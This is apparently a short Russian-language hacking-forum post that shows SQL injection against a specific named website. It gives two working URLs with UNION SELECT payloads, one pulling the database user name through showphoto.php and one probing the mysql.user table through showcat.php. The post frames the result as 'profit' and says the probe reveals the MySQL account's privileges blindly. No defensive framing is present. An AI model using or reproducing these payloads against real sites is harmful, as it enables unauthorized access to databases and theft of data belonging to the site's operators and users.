Друзья! Не забываем про внимательность и настойчивось.

ПРОФИТ:

http://www.ivrus.biz/showphoto.php?fid=6&pid=4&id=-1+union+select+1,2,3,user(),5,6,7--+

А вообще вот так:

http://www.ivrus.biz/showcat.php?id=7+union+select+1,2,3+from+mysql.use r--+

можно понять что пользователь mysql имеет какие-то более-менее значимые привилегии в данном случае 'в слепую'.